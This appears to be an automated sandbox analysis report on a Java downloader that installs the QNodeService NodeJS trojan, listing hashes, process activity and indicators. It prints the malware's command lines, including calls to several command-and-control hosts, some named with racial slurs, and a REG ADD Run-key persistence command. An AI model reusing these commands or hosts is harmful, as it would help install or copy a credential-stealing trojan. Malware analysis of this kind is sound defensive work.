Analysis
-
max time kernel
119s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
07-07-2020 08:30
Static task
static1
Behavioral task
behavioral1
Sample
Anführungszeichen 00826__pdf.jar
Resource
win7
Behavioral task
behavioral2
Sample
Anführungszeichen 00826__pdf.jar
Resource
win10v200430
General
-
Target
Anführungszeichen 00826__pdf.jar
-
Size
11KB
-
MD5
c0f75e92112c654930809ee53974d110
-
SHA1
c9751343def42d1056cbc73461c613c57dc4cf4a
-
SHA256
e19994da703630d50798f4346431430f349bbab079b015572c48e867e160bd3b
-
SHA512
c16d650b0bcda2b50b31832f0154e3efcf9bc79c3f97d7fd54535023320fe80a794f7fcef741b1c7f62e3881c99ec43f92c1dea8dcbaadeefee5a88ef2a50cc2
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1520 wrote to memory of 356 1520 java.exe 73 PID 1520 wrote to memory of 356 1520 java.exe 73 PID 356 wrote to memory of 2208 356 node.exe 74 PID 356 wrote to memory of 2208 356 node.exe 74 PID 2208 wrote to memory of 3760 2208 cmd.exe 75 PID 2208 wrote to memory of 3760 2208 cmd.exe 75 PID 356 wrote to memory of 1196 356 node.exe 76 PID 356 wrote to memory of 1196 356 node.exe 76 -
Loads dropped DLL 4 IoCs
pid Process 1196 node.exe 1196 node.exe 1196 node.exe 1196 node.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-4f9a1ccf = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-4f9a1ccf.cmd\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 wtfismyip.com 14 wtfismyip.com -
Executes dropped EXE 2 IoCs
pid Process 356 node.exe 1196 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1196 node.exe 1196 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfb9-119.dat family_qnodeservice -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Anführungszeichen 00826__pdf.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-4f9a1ccf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-4f9a1ccf.cmd\""4⤵
- Adds Run entry to start application
PID:3760
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://coolnigga.linkpc.net --central-base-url https://mynigga.servehttp.com --central-base-url https://coolboy.serveftp.com --central-base-url https://badboy.linkpc.net3⤵
- Loads dropped DLL
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
PID:1196
-
-